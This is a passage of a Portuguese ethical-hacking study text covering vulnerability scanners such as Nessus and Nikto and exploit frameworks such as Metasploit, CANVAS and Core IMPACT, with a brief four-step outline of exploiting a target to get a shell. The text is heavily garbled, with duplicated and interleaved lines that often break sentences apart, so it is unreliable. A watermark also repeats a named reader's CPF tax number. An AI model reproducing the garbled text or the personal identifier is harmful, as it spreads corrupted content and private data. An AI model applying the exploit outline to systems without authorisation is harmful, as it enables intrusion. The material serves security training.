gratuitos e outros são para compra ou que são executados através de um serviço de assinatura.
Você verá que não
não há falta de ferramentas
ferramentas de avaliação de vulnerabilidade
vulnerabilidade no mercado.
mercado. Estas
Categorias ferramen
ferramentas podemta automatizada de Ava liação
podem ser utilizadas para verificar
verificar se os computadores
computadores internos ou externos
externos para detectar
vulnerabilidades. Algumas
Algumas dessas ferramentas
ferramentas são comerciais e pode exigir uma assinatura anual,
enquanto outros são
são de código aberto e não vai custar nada para adquirir
adquirir inicialmente.
inicialmente. Todas estas
ferramentas
Objetivo: pode
podem m ser divididos em três c
categorias
ategorias básicas, inclu
incluindo:
indo:

 Scanners de código fonte examinam


examinam o código fonte de um aplicativo.
Discutir os diferent
 Scanners deesaplicação
tiposção
aplica de instrument
examinam os automatizados
uma de avalia
aplicação específica oução.
tipo de aplicação.
 Scanners sistema
sistema examinam sistemas
sistemas inteiros ou redes
redes de problemas de configuração
configuração ou de
aplicação.

VocêScanners
verá quednãe oCódigo
há falta
Fode
[Link] de avaliação de vulnerabilidade no mercado. Estas
Fonte.
ferramentas podem ser utilizadas para verificar se os computadores internos ou externos para detectar
vulnerabilidades.
 Algumas dessas ferramentas são comerciais e pode exigir uma assinatura anual,
enquanto
 outros são de código aberto e não vai custar nada para adquirir inicialmente. Todas estas 21
ferramentas
 podem ser divididos em três categorias básicas, incluindo:

Scanners de código fonte examinam o código fonte de um aplicativo.


Scanners de aplicação examinam uma aplicação específica ou tipo de aplicação.
Scanners sistema examinam sistemas inteiros ou redes de problemas de configuração ou de
aplicação.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

Scanners de código-fonte
código-fonte podem ser usados para ajudar ajudar em problemas de auditoria
auditoria de segurança em
código fonte. Scanners de código fonte podem podem detectar problemas,
problemas, tais como buffer overflows,
overflows,
condições de corrida, escalação
escalação de privilégios,
privilégios, e entrada contaminada.
contaminada. Buffer overflows
overflows permitir que
dados sejam escritos
escritos sobre partes do do seu executável, que podem permitir que um usuário usuário malicioso
possa fazer praticamente
praticamente qualquer coisa. Condições de corrida pode pode evitar que os sistemas
sistemas de proteção
de funcionam corretamente,
corretamente, ou negar a disponibilidade
disponibilidade de recursos
recursos para os seus
seus usuários legítimos.
legítimos.
Escalação de privilégios
privilégios ocorre quando o código
código é executado com com privilégios maiores
maiores do que a do
usuário executou. Contaminação
Contaminação de entrada
entrada permite que que os dados potencialmente sem verificação
através de suas defesas,
defesas, possivelmente,
possivelmente, qualificada como informação
informação de erros já verificados. Algumas
ferramentas usadas
usadas para encontrar estes tipos tipos de problemas incluem:
incluem:
Scanners de código-fonte podem ser usados para ajudar em problemas de auditoria de segurança em
código fonte. Scanners de código fonte podem detectar problemas, tais como buffer overflows,
condições de corrida, escalação de privilégios, e entrada contaminada. Buffer overflows permitir que
 Flawfinder. Um programa
programa Python que procuraprocura através de código
código fonte para potenciais falhas
falhas de
dados sejam escritos
segurança, sobreo partes
listand
listando do seu
potenciais executável,
falhas que podem
de segurança
segurança permitir
classificad as porque
classificadas umcom
risco, usuári
asofalhas
malicioso
falhas
possa fazer praticamentemais
potencialmente qualquer coisa.
perigosas mCondições
mostrada de corrida pode evitar que os sistemas de proteção
ostrada primeiro.
de funcionam
 Roughcorre tamente,
Auditing Tool for
Tool ou Security
negar a disp onibilidade
(RATS). de recursos
RATS é escritA
RATS em Cpara os seuexternas
e contém s usuários legítimos.
regras DE
coleções
Escalação XMLosque
de privilégi se aplicam
se
ocorre quandoa ocada idioma.
idioma.
código é executado com privilégios maiores do que a do
 StackGuard.
usuário Um compilador
compilador
executou. Contaminação que constrói
de entradconstr ói programas
a permite protegid
protegidos
que os dados os contra ataques
potencialmente sem de
dverificação
e
esmagamento de pilha. pilha. Ataques de esmagamento
esmagamento de Pilhas são são um problema comum
comum e grande
através de suas defesas, possivelmente, qualificada como informação de erros já verificados. Algumas
para aplicações Linux e Windows. Após programasprogramas são compilados com StackGuard, eles são
ferramentas
 usadas para encontrar estes tipos de problemas incluem:
em grande parte imune ao ataque de esmagamento de de pilha.
 Libsafe. Produz um um método de proteção
proteção no transparente
transparente que tem a grande
grande vantagem
vantagem de não
 necessitar de aplica
aplicações
ções para ser rec
recompilado.
ompilado. Ela protege c
contra
ontra estouros de buffer e pode
pode
proteger aplicaç
aplicações
ões para as quais o códig
códigoo fonte não e
está
stá disponível.
Flawfinder. Um programa Python que procura através de código fonte para potenciais falhas de
 segurança, listando potenciais falhas de segurança classificadas por risco, com as falhas
potencialmente mais perigosas mostrada primeiro.
Scanners a Nível de Aplicação.
Aplicação.
Rough Auditing Tool for Security (RATS). RATS é escritA em C e contém externas regras DE
coleções XML que se aplicam a cada idioma.
StackGuard. Um compilador que constrói programas protegidos contra ataques de
Scanners para nível de aplicativo são o próximo
próximo tipo de scanner de vulnerabilidade examinados.
esmagamento de pilha. Ataques de esmagamento de Pilhas são um problema comum e grande
Scanners de aplicativ
aplicativos
os fornecem testes
para aplicações Linux e Windows. Após contra
contra candidaturas
progra completascom
mas são compilados ou componentes,
StackGuard, elesemsão
em vez
de oem
código fonte.
grande Este
parte tipo de
imune ao ferramenta de avaliação de
ataque de esmagamento devulnerabilidades
vulnerabilid
pilha. ades olha como o programa
programa
estáLibsafe.
sendo executado.
executad
Produz [Link]
método de pode
proexaminar
exa minar
teção sua configuração
no transparente que etem
olhar paradeosvanta
a gran proble
problemas
gemmasde. Alguns
não
necessitar de aplica ções para ser
exemplos de nível de aplicativo incluem: recompilado. Ela protege contra estouros de buffer e p ode
proteger aplicações para as quais o código fonte não está disponível.
Scanners a Nível de Aplicação.
Whisker. Um dos scanners
scanners mais antigos de aplicativos
aplicativos da Web ainda existente.
existente. Whisker tem
tem a
capacidade de verificar
verificar vulnerabilidades CGI, e vem com excelente documentação,
documentação, que deve ser ser
cuidadosamente revista.
revista. CGI é vulnerável na medida em que pode vazar informações do sistema sistema
Scanners
que deve para nível deem
ser mantida eaplicativo
m sigilo, esão o próxi
permite mousuários
que tipo des scanner
usuário remotosde vulnerabilidade
possam examinados.
executar comandos
Scanners de aplicativ
inadequados. Whisker
Whisker osexige
fornecem testes
Perl, por contra
isso,
isso, candidaturas
se você completas
estiver indo
indo ou componentes,
usá-lo, certifique-se de queevocê
m vez
de
temo um
código
ambi fonte.
ambiente Este tipo dePerl
ente apropriado ferramenta de avaliação de vulnerabilidades olha como o programa
disponível.
disponível.
está sendo executado. Scanners pode examinar sua configuração e olhar para os problemas. Alguns
exemplos
N-stealth. de nível
Esta de aplicativo
é baseada incluem: GUI de avaliação
em ferramenta
em avaliação de aplicação vem
vem com um extenso bancobanco
de dados de mais de 30.000 vulnerabilidades
vulnerabilidades e exploits. Ela fornece um relatório bem formatado
formatado
que pode ser usado para analisar problemas
problemas como alto, médio
médio ou baixo risco.
risco.
Whisker. Um dos scanners mais antigos de aplicativos da Web ainda existente. Whisker tem a
capacidade de verificar vulnerabilidades CGI, e vem com excelente documentação, que deve ser
cuidadosamente revista. CGI é vulnerável na medida em que pode vazar informações do sistema 22
que deve ser mantida em sigilo, e permite que usuários remotos possam executar comandos
inadequados. Whisker exige Perl, por isso, se você estiver indo usá-lo, certifique-se de que você
tem um ambiente apropriado Perl disponível.

N-stealth. Esta é baseada em ferramenta GUI de avaliação de aplicação vem com um extenso banco
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

WebInspect. Outra ferramenta


ferramenta de vulnerabilidade em aplicativo
aplicativo web de escaneamento.
escaneamento. Ela pode
procurar por mais de 1.500 servidores da Web conhecidos e vulnerabilidades
vulnerabilidades de aplicativos
aplicativos e
realiza verificações em conjecturas inteligentes
inteligentes para senhas
senhas fracas.

Nikto. Simples, fácil que usa


usa programa script Perl
Perl de vulnerabilidade na internet
internet que é rápida e
completa. Ele suporta
suporta até mesmo escaneamento
escaneamento básico de porta para determinar
determinar se um servidor
servidor
da Web está sendo executado em todas as portas
portas abertas.

AppDetective. Este scanner


scanner de nível de aplicativo
aplicativo realiza testes
testes de penetração e auditoria.
auditoria. O Pen
Test examina o seu sistema
sistema a partir do ponto de vista de um hacker. Ela não não precisa de nenhuma
WebInspect.
permissão Outra oferramenta
interna, de vulnerabilidade
teste consulta o servidor emrecolher
servidor e tenta aplicativinformações
o web
infor de escaneam
mações sobre oento.
sobre bancoEladepode
dados
procurar
está por mais
em execução,
execuçã o,de
tais1.500
comoservidores
a sua versão.
versã[Link] conhecidos
O teste e vulnerab
de auditoria
auditoria ilidades de
pode detectar aplicativos
qualq
qualquer e de
uer número
realiza verificações
violações de segurança
seguranem
ça conjecturas inteligente
em seu servidor, s para
de falta senhas
de senhas
senh asefracas.
contas de usuário facilmente
facilmente
descobertas para service
service packs desaparecidos
desaparecidos e patches de segurança.
segurança.
Nikto. Simples, fácil que usa programa script Perl de vulnerabilidade na internet que é rápida e
completa. Ele suporta até mesmo escaneamento básico de porta para determinar se um servidor
da Web está sendo executado em todas as portas abertas.
Scanners a Nível
Nível de Sistemas.

AppDetective. Este scanner de nível de aplicativo realiza testes de penetração e auditoria. O Pen
A última
Test categoria
examina o seude
dsist
e scanners é no do
ema a partir nível
nível do sistema.
ponto de vista Estes
de umtipos de scanners
hacker. são versáteis
são
Ela não precisa uma vez
de nenhuma
que podeminterna,
permissão sondar osistemas
sisteste
temas compleotos
completos
consulta e seus
servid or ecomponentes,
tenta recolherem vezmações
vez
infor de aplicações
sobre oindividuais. Um
banco de dados
está em de
scanner execuçã
nível o,
detais
de comopode
sistema a suaser
versã
ser o. O teste
executado emdeum
em auditoria pode detectar
único endereço
endereç o ou uma qualq uer
faixa denúmero de
endereços
eviolações
tambémde pode
pode testar
seguran çaaemeficácia das medidas
seu servidor, de segurança
de falta seguran ça eem
de senhas camadas,
contas como um
como
de usuário sistema
facilment e que
descobertas
corre atrás depara
um ser
um vice packs
firewall. desap
Nessus arecidos
é um bom exemplo
bom e patchesdede
umsegurança.
scanner de nível de sistema.

Embora
Scannersoascanner
Nível dedeSistemas.
nível de sistema não vai sondar o código-fonte de aplicações aplicações individuais, eles
podem varrer redes inteiras
inteiras em busca de uma variedadevariedade de vulnerabilidades.
vulnerabilidades. Ao realizar um
sistema
si stema de hacker ético, scanners de nível nível pode ser usado
usado remotamente. Isto Isto é muito mais
eficiente do que a tentativa de auditar a configuração de cada máquina individual. Scanner de
A últimanão
sistema categoria [Link]
é perfeito.
perfei Eles nãoépodem
no ním
pode velauditar
do sistema.
fontEstes
a fontee dos tipos de scanners
processos que sãosãprestadoras
o versáteis umade vez
que podem
serviços, sondar
e devem
deve sistemas
m contar comcomple tos e seus
as respostas
respostas componentes,
de um serviço paraem
serviço umvez de aplicações
número finito deindividuais.
finito sondas, o queUm
scanner de
significa quenível
todasdeas
sistema
entradas pode ser executado
possíveis não podem
não em umser único endereç
razoavel menteo testadas.
razoavelmente ou uma faixa Scande
Scanners endereços
ners de nível
edetambém
sistemaptambém
ode
ta testar
mbém pode a eficácia das medidas
travar sistemas.
siste de seguran
mas. Muitos ça em
dos testes quecamadas, como umsão
podem executar
podem sistema que
considerados
corre atrásede
perigosos um firewall.
podem desligarNessus
desligar sisteéma.
do [Link] Apesar
bom exemplo de um
de muitas
muitas scanner de
ferramentas denível
deste
ste tipode sistema.
podem realizar
realizar
evasão IDS, eles geralmente
geralmente não são considerados ferramentas ferramentas stealth. Portanto,
Portanto, se o objetivo
objetivo do
Embora
teste de osegurança
scanner
seguran çade nível de
é passar sistema não
despercebi
despercebido,do, vai
umsondar
scannero de
código-fonte
nível de sistema
nível de aplicações
pode não individuais,
ser a melhoreles
podem varrer
escolha uredes
para uma inteiras em busca de uma variedade de vulnerabilidades. Ao realizar um
ma ferramenta.
sistema de hacker ético, scanners de nível pode ser usado remotamente. Isto é muito mais
eficiente do queoa ponto
Provavelmente, tentativa maisdeimportante
auditar aeconfiguração
important de cada
sobre o scanners
scanners máquina
de nível individual.
de sistema é queScanner de são
eles não são
sistema
um não é perfei
substituto to.
para testes
te stesEles não pode
e exames m auditar
mais a fontEles
completos. e dos processos
são que ferramenta
apenas uma são prestadoras no kitdedo
serviços,
hacker e deve
ético. m não
Eles contardevemcomseras rvistos
espostas
vist os comodeoum serviço
único para um número
componente
componente de um testefinte
tes itodedepenetração.
sondas, o que O
significa
seu papelque todasementar
as entradas
é complementar
compl possíveis
outras não podem
ferramentas
ferramentas ser razoavel
e técnicas mente
de testes. testadas.
Código fonte eScan
fonte ners de nível
escaneament
escaneamento o
sistema também
de aplicativo também
também pode
devetravar sistemas. quando
ser utilizados, Muitos
quan do dos testesUma
aplicável. que pavaliação
odemção
avalia executar vulnsão considerados
de vulnerabilidade
erabilidade em
perigosos e podem
profundidade consisdte
consisteesligar do siste
de todos cma. Apesar deque
os componentes
omponentes muinós
tas discutimos.
ferramentas
discuti destepode
mos. Nada tipo substituir
podem realizar
evasão IDS, eles outra
completamente geralmente não são
ferramenta. considerados
Vam
Vamosos agora olharferramenta
para alguns
para s stealth. Portanto,de
dos scanners desenível
o objetiv
mais o do
teste de do
popular seguran ça :é passar despercebido, um scanner de nível de sistema pode não ser a melhor
sistema
sistema:
escolha para uma ferramenta.
23
Provavelmente, o ponto mais importante sobre o scanners de nível de sistema é que eles não são
um substituto para testes e exames mais completos. Eles são apenas uma ferramenta no kit do
hacker ético. Eles não devem ser vistos como o único componente de um teste de penetração. O
seu papel é complementar outras ferramentas e técnicas de testes. Código fonte e escaneamento
de aplicativo também deve ser utilizados, quando aplicável. Uma avaliação de vulnerabilidade em
profundidade consiste de todos os componentes que nós discutimos. Nada pode substituir
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

 Nessus. Um open
open source, compreensivo,
compreensivo, scanner de vulnerabilidade
vulnerabilidade de cross-platform
cross-platform com
Command Line Interface
Interface (CLI) e interface gráfica
gráfica do usuário (GUI). Nessus tem uma
arquitetura cliente / servidor
servidor com clientes disponíveis
disponíveis para UNIX, Linux e Windows e
servidores disponíveis
disponíveis para UNIX, Linux e Windows
Windows (comercial). Nessus é um poderoso,
flexível e ferramenta de varredura de auditoria
auditoria. É preciso um "nada por garantir" de
de
abordagem básica. Por Por exemplo, uma porta
porta aberta não significa necessariament
necessariament
cessariamentee que um
serviço eseja ativo.
ativo. Nessus lhe diz o que está errado e fornece sugestões
sugestões para a fixação de
um determinado problema.
problema. Ele também suporta
suporta vários tipos de plugins, que
que vão desde um
 inofensivo para aqueles que podem derrubar um servidor. O menu Plugins Plugins é mostrada na
Figura 5.3.

Nessus. Um open source, compreensivo, scanner de vulnerabilidade de cross-platform com


Command Line Interface (CLI) e interface gráfica do usuário (GUI). Nessus tem uma
arquitetura cliente / servidor com clientes disponíveis para UNIX, Linux e Windows e
servidores disponíveis para UNIX, Linux e Windows (comercial). Nessus é um poderoso,
flexível e ferramenta de varredura de auditoria. É preciso um "nada por garantir" de
abordagem básica. Por exemplo, uma porta aberta não significa necessariamente que um
serviço eseja ativo. Nessus lhe diz o que está errado e fornece sugestões para a fixação de
um determinado problema. Ele também suporta vários tipos de plugins, que vão desde um
inofensivo para aqueles que podem derrubar um servidor. O menu Plugins é mostrada na
Figura 5.3.

 Newt (Nessus para Tecnologia do Windows).


Windows). A versão para Windows
Windows do Nessus, que tem as
mesmas capacidades e verificações do Nessus. A versão gratuita só pode verificar a rede

24


Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

local. A versão mais potente remota deve ser comprada. A página


página de configuração é
mostrada na Figura 5.4.

local. A versão mais potente remota deve ser comprada. A página de configuração é
mostrada na Figura 5.4.

 SAINT. Este scanner


scanner comercial proporciona
proporciona à indústria varredura refernte a vulnerabilidade
vulnerabilidade
e identificação. Ele tem uma interface
interface baseada na web,
web, e as plataformas de implantação
implantação
para este produto são
são Linux e UNIX. É certificado
certificado com Common
Common Vulnerabilities and
Exposures (CVE), aderente
aderente e permite
permite priorizar e classificar
classificar vulnerabilidades que permitem
permitem
determinar as questões
questões de segurança
segurança mais importantes
importantes que você deve atacar primeiro.
primeiro.

 SARA. Este scanner de de nível de sistema


sistema possui uma interface
interface de linha de comando
comando e GUI
 baseada na web. É umauma aplicação freeware. Em vez de inventar um novo módulo para para a
ação nunca imagináveis,
imagináveis, SARA é adaptada para a interface com com outros produtos de de código
aberto. É considerado
considerado um scanner suave, o que significa que o escaneamento não não
apresenta um risco
risco para a infra-estrutura da rede
rede operacional. É compatível
compatível com a SANS
SAINT. Este scanner comercial proporciona à indústria varredura refernte a vulnerabilidade
Top 20, suporta referências
referências CVE para as vulnerabilidades identificadas,
identificadas, e pode ser
e identificação. Ele tem uma interface baseada na web, e as plataformas de implantação
implantado em UNIX, LinuxLinux e Mac OS X.
para este produto são Linux e UNIX. É certificado com Common Vulnerabilities and
 Exposures (CVE), aderente e permite priorizar e classificar vulnerabilidades que permitem
determinar as questões de segurança mais importantes que você deve atacar primeiro.
 ISS Internet Scanner. Um produto comercial
comercial disponível a partir da Internet
Internet Security
Security
Systems. Sua plataforma
plataforma de implementação
implementação é o Windows NT/2000/XP/200
NT/2000/XP/2003. 3. O pacote
oferece extensa análise
análise de vulnerabilidade
vulnerabilidade e de identificação emem todas as plataformas e
SARA. Este scanner de nível de sistema possui uma interface de linha de comando e GUI
dispositivos de rede
rede via CLI e interfaces
interfaces gráficas. Ele pode
pode identificar mais de 1.300 tipos de
baseada na web. É uma aplicação freeware. Em vez de inventar um novo módulo para a
dispositivos de rede.
rede. Após estes dispositivos
dispositivos tenham sido
sido escaneados e identificados,
identificados,
ação nunca imagináveis, SARA é adaptada para a interface com outros produtos de código
Internet Scanner pode
pode analisar a sua configuração,
configuração, níveis
níveis de patch, sistemas operacionais
operacionais e
aberto. É considerado um scanner suave, o que significa que o escaneamento não
apresenta um risco para a infra-estrutura da rede operacional. É compatível com a SANS
 Top 20, suporta referências CVE para as vulnerabilidades identificadas, e pode ser 25
implantado em UNIX, Linux e Mac OS X.

ISS Internet Scanner. Um produto comercial disponível a partir da Internet Security


Systems. Sua plataforma de implementação é o Windows NT/2000/XP/2003. O pacote
oferece extensa análise de vulnerabilidade e de identificação em todas as plataformas e
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

aplicativos instalados. Então,


Então, ele pode gerar um relatório de identificação
identificação de
vulnerabilidades.

 NetRecon. Um scanner
scanner comercial produzido
produzido pela Symantec.
Symantec. Ele fornece análise de
vulnerabilidade e identificação.
identificação. Ela tem a capacidade de aprender sobre
sobre a rede, uma
uma vez
que é um escaneador.
escaneador. Como exemplo, se encontra e quebra
quebra uma senha em um um sistema, e
vai tentar a mesma
mesma senha em outros sistemas.
sistemas. O aplicativo possui
possui uma interface gráfica, e
sua plataforma de implementaçã
implementaçã
mplementação o é o Windows NT/2000/XP.

 Retina. Um produto
produto comercial da eEye
eEye Digital Security.
Security. Ele fornece varredura
varredura de
 aplicativos instalados.
vulnerabilidades Então, ele
em sistemas pode gerar
e dispositivos
dispositi umrede.
vos de relatório
Ele éde identificação
rápid
rápido de
o e pode descobrir
vulnerabilidades.
dispositivos com e sem
sem fio. Retina tem
tem uma interface gráfica,
gráfica, e sua plataforma de
implementação é o Windows NT/2000/XP/2003.
NT/2000/XP/2003.
NetRecon. Um scanner comercial produzido pela Symantec. Ele fornece análise de
 vulnerabilidade
LANguard. e identificação.
Um scanner
scanner serviçEla
de serviço tem a capacidade
o completo relatadeasaprender
que relata sobretais
informações, asrede,
tai comouma vez de
o nível
que é um escaneador. Como exemplo, se encontra e quebra uma senha em um sistema, e
pacote de serviço de cada máquina,
máquina, patches de segurança,
segurança, as ações abertas,
abertas, portas
 vai tentarserviços
abertas, a mesma senha emativo
/ aplicativo outrosnosistemas.
compu O aplicativo
computador,
tador, possui
as principais
principais uma interface
entradas regisgráfica,
de registro,
tro, e
sua plataforma de implementação é o Windows NT/2000/XP.
senhas fracas, usuários e grupos, e mais.

 Retina.
VLAD. UmUmscanner
produtode
decomercial da eEye
vulnerabilidad
vulnerabilidade Digital
e de códigoSecurity. Ele
aberto. fornece
Escri to em varredu
Escrito ra de
Perl, Vlad é projetado
projetado
vulnerabilidades em sistemas e dispositivos de rede. Ele é rápido e pode descobrir
para identificar vulnerabilidades
vulnerabilidades no 10 SANS
SANS Top List. Ele foi
foi testado em Linux, OpenBSD e
 dispositivos
FreeBSD. com e sem fio. Retina tem uma interface gráfica, e sua plataforma de
implementação é o Windows NT/2000/XP/2003.

Há todos os tipos de
de ferramentas de avaliação de
de vulnerabilidade. Certifique-se
Certifique-se de que você
LANguard. Um scanner de serviço completo que relata as informações, tais como o nível de
compreende as capacidades
capacidades de cada um. Alguns
Alguns das mais importantes
importantes são mostradas aqui:
aqui:
pacote de serviço de cada máquina, patches de segurança, as ações abertas, portas
 abertas, serviços / aplicativo ativo no computador, as principais entradas de registro,
senhas fracas, usuários e grupos, e mais.
Nome Plataforma Abilidade

Nessus Linux VLAD. Um scanner de vulnerabilidad


Open source, e de
scan ner a nivel
scanner código aberto. Escrito em Perl, Vlad é projetado
de Sistema
para identificar vulnerabilidades no 10 SANS Top List. Ele foi testado em Linux, OpenBSD e
Flawfinder Linux FreeBSD. Scanner de código Fonte

Whisker Linux/Windows Scanner Aplicativo da Web


Há todos os tipos de ferramentas de avaliação de vulnerabilidade. Certifique-se de que você
RATS Linux
compreende asScanner de código
capacidades Fonteum. Alguns das mais importantes são mostradas aqui:
de cada
N-Stealth Windows Scanner Aplicativo da Web
Nome Plataforma Abilidade
NeWT Windows Scanner Nível de Sistema como
co mo Nessus
Nessu s
Nessus Linux Open source, scan ner a nivel de Sistema
Nikto Linux/Windows Scanner Aplicativosda Web em Perl
Flawfinder Linux Scanner de código Fonte
SARA Linux/Mac Scanner Nível de Sistema
Whisker Linux/Windows Scanner Aplicativo da Web
LANGuard Windows Sacanner Comercial Nível
Ní vel de Sistema
RATS Linux Scanner de código Fonte

N-Stealth Windows Scanner Aplicativo da Web

NeWT Windows Scanner Nível de Sistema co mo Nessu s


26
Nikto Linux/Windows Scanner Aplicativosda Web em Perl

SARA Linux/Mac Scanner Nível de Sistema

LANGuard Windows Sacanner Comercial Ní vel de Sistema


Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

Alerta de exame

Você deve ser capaz de descrever os diferentes tipos de scanners e discutir como cada um é
usado.
Exploit automatizado e Ferramentas de Avaliação.

Objetivo:
Identificar a operação de ferramentas automatizadas de exploração

Embora as ferramentas de avaliação recentemente discutidas podem fazer o seu trabalho trabalho muito
mais fácil, o
Alerta de examepróximo conjunto de ferramentas a ser discutido será ainda mais intrigante. Estas
Estas
ferramentas revelam onde o software de avaliação de vulnerabilidade está dirigido. Ferramentas
como o Nessus
Você deve e outros
ser capaz desempre tiveram
descrever a capacidade
os diferentes tiposdedeintegrar
scannersa verificação,
verificação, avaliação
e discutir acomo
valiação
cadae um é
funções
usado. de relatório. As ferramentas na lista a seguir tomam essa funcionalidade pa
para
ra a próxima
etapa com a integração da capacidade de explorar
explorar uma vulnerabilidade suspeita. Isso mesmo,
essas ferramentas
Exploit automatizadopodem realmente oferecer
e Ferramentas exploração com um clique só. Esta seção discute a
de Avaliação.
ferramenta de exploração Metasploit Framework
Framework gra gratuita,
tuita, e depois passa para a tela, e IMPACT
Core, que são dois produtos comerciais.
Objetivo:

Metasploit. Um teste de exploração tudo-em-um e ferramenta de desenvolvimento. Metasploit


permite quea você
Identificar digitedeum
operação endereço IP
ferramentas e o número da
automatizadas de porta de uma máquina de destino e
exploração
execute o exploit escolhido contra a máquina alvo com bastante facilidade. Esta é uma
ferramenta de código aberto que pode ser comparada a CANVAS e IMPACTO Core. Metasploit
Embora as ferramentas de avaliação recentemente discutidas podem fazer o seu trabalho muito
foi
maisdesenvolvida usando
fácil, o próximo Perl, linguagem
conjunto linguage m C, e Py
de ferramentas Payser
thon. Ele estáserá
discutido disponível paraintrigante.
ainda mais Linux e Windows.
Estas
Ela pode ter a vítima ligando de volta para você, abrindo um shell de
ferramentas revelam onde o software de avaliação de vulnerabilidade está [Link] na vítima,
vítim a, ou
Ferramentas
permitir que você execute o código na vítima. Depois de ter um Shell sobre a vítima, estara
como o Nessus e outros sempre tiveram a capacidade de integrar a verificação, a valiação e
apenas a alguns passos de distância de fazer-se um usuário privilegiado.
funções de relatório. As ferramentas na lista a seguir tomam essa funcionalidade para a próxima
etapa com a integração da capacidade de explorar uma vulnerabilidade suspeita. Isso mesmo,
Um
essasFramework
ferramentasexploração similar para
podem realmente Metasploit,
oferecer ex ce
exce
exploração ceto
to que
com umeste instrumento
clique particular
só. Esta seção é a
discute
apoiado
ferramenta pordeum dos maiores
exploração bancos de
Metasploit dados ork
Framew de exploits
gratuita,conhecidos.
e depois passaElepara
ex ec
exec
ecuta
auta fora
tela, do banco
e IMPACT
de dados ExploitTree que está disponível publicamente. É quase assustador examinar como é
Core, que são dois produtos comerciais.
fácil esta ferramenta de usar até mesmo pelo novato completo. Um screenshot do Framework Framework de
exploração pode ser visto na Figura 5.5. Depois de ter utilizado um scanner de nível de sistema
Metasploit. Um teste de exploração tudo-em-um e ferramenta de desenvolvimento. Metasploit
(como
permiteoqueNessus)
você para
digiteencontrar uma vulnerabilidade,
um endereço IP e o número daosporta
ataques podem
de uma ser lançados
máquina de destinoem equatro
passos simples:
execute o exploit escolhido contra a máquina alvo com bastante facilidade. Esta é uma
ferramenta de código aberto que pode ser comparada a CANVAS e IMPACTO Core. Metasploit
foi desenvolvida usando Perl, linguagem C, e P ython. Ele está disponível para Linux e Windows.
1. Selecione seu exploit da Lista Exploit.
Ela pode ter a vítima ligando de volta para você, abrindo um shell de comando na vítim a, ou
2. Especifique
permitir todos
que você os parâmetros
execute o código necessários.
na vítima. Depois de ter um Shell sobre a vítima, estara
3. Clique no botão Exploit.
apenas a alguns passos de distância de fazer-se um usuário privilegiado.
4. Aproveite o shell que agora você tem no computador da vítima.
Um Framework exploração similar para Metasploit, ex ceto que este instrumento particular é
apoiado por um dos maiores bancos de dados de exploits conhecidos. Ele ex ecuta fora do banco
de dados ExploitTree que está disponível publicamente. É quase assustador examinar como é
fácil esta ferramenta de usar até mesmo pelo novato completo. Um screenshot do Framework de
exploração pode ser visto na Figura 5.5. Depois de ter utilizado um scanner de nível de sistema
(como o Nessus) para encontrar uma vulnerabilidade, os ataques podem ser lançados em quatro
passos simples:

1. Selecione seu exploit da Lista Exploit.


2. Especifique todos os parâmetros necessários. 27
3. Clique no botão Exploit.
4. Aproveite o shell que agora você tem no computador da vítima.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

Dica

Praticar o uso do Framework de Exploração para entender seu funcionamento.

CANVAS. Uma ferramenta de ataque automatizada e pent test desenvolvida por Dave Aitel da
[Link]. Ela foi escrito em Python, por isso é portátil para Windows e Linux. É uma
ferramenta comercial que pode fornecer ao profissional de segurança uma capacidades de ataque
e penetração. Como Metasploit, não é uma ferramenta tudo-em-um completa. Ela não faz uma
descoberta inicial, de modo que você deve adicionar seus alvos manualmente. É mais limpa e
mais avançada que Metasploit, mas exige que você compre uma licença. No entanto, isso não
fornece atualizações e suporte. No geral, esta é uma ferramenta de primeira linha para alguém
com
Dicaexperiência em avaliação de penetração.

Core IMPACT. Uma avançada suite comercial de ferramentas de testes de penetração. Core
IMPACT é um ponto de maturidade e um clique em exploração automatizada e ferramenta de
avaliação. É um
Praticar o uso dopacote completo
Framework com os passos
de Exploração parado usuárioseu
entender através do processo, a partir de
funcionamento.
escaneamento e continuação até a fase de exploração e controle. Uma característica única do
produto é que ele suporta uma característica conhecida como articulação. Basicamente um
CANVAS. Uma ferramenta de ataque automatizada e pent test desenvolvida por Dave Aitel da
pivoting (giratório) que permite que uma máquina comprometida ser usada para comprometer
[Link]. Ela foi escrito em Python, por isso é portátil para Windows e Linux. É uma
uma outra. Esta
ferramenta ferramenta
comercial é útilfornecer
que pode para todos, desde o iniciante
ao profissional até o profissional
de segurança de segurança.
uma capacidades Dê
de ataque
uma olhada na interface mostrada na Figura 5.6.
e penetração. Como Metasploit, não é uma ferramenta tudo-em-um completa. Ela não faz uma
descoberta inicial, de modo que você deve adicionar seus alvos manualmente. É mais limpa e
mais avançada que Metasploit, mas exige que você compre uma licença. No entanto, isso não
fornece atualizações e suporte. No geral, esta é uma ferramenta de primeira linha para alguém
com experiência em avaliação de penetração.

Core IMPACT. Uma avançada suite comercial de ferramentas de testes de penetração. Core
IMPACT é um ponto de maturidade e um clique em exploração automatizada e ferramenta de
avaliação. É um pacote completo com os passos do usuário através do processo, a partir de 28
escaneamento e continuação até a fase de exploração e controle. Uma característica única do
produto é que ele suporta uma característica conhecida como articulação. Basicamente um
pivoting (giratório) que permite que uma máquina comprometida ser usada para comprometer
uma outra. Esta ferramenta é útil para todos, desde o iniciante até o profissional de segurança. Dê
uma olhada na interface mostrada na Figura 5.6.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
